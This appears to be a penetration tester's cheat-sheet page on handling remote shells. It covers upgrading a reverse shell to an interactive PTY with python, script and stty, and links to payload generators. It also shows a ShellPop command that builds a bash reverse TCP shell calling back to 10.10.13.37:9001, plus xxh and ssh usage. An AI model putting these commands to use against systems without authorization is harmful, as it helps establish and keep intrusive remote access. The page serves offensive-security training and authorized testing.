Shells

Upgrade to PTY

 # Spawn PTY
$ if python3 -V > /dev/null 2>&1; then
  python3 -c 'import pty; pty.spawn("/bin/bash")'
elif python -V > /dev/null 2>&1; then
  python -c 'import pty; pty.spawn("/bin/bash")'
fi
Or
$ script -q /dev/null /bin/bash

 # Background remote shell
user@remote:~$ ^Z

 # Get rows and cols from local terminal
root@kali:~$ stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'

 # Disable local output in terminal
root@kali:~$ stty raw -echo; fg

 # (optional) Reset remote terminal
user@remote:~$ reset

 # Set rows and columns for proper text aligning
user@remote:~$ stty rows ${ROWS} cols ${COLS}

 # For CTRL-L to work
user@remote:~$ export TERM=xterm / xterm-color / xterm-256color

 # (optional) Get Bash new process image
user@remote:~$ exec /bin/bash [-l]

Tools

http://www.jackson-t.ca/runtime-exec-payloads.html

ShellPop

https://github.com/0x00-0x00/ShellPop

Bash reverse TCP example:

$ shellpop -H 10.10.13.37 -P 9001 --reverse --number 8 --base64

pwncat

xxh

https://github.com/xxh/xxh

$ pipx install xxh-xxh
$ source xxh.zsh -i id_rsa snovvcrash@192.168.1.11 +I xxh-plugin-zsh-ohmyzsh +if [+q/+vv]
$ ssh -i id_cthulhu snovvcrash@192.168.1.11 -f "rm -rf .xxh"

Last updated 3 years ago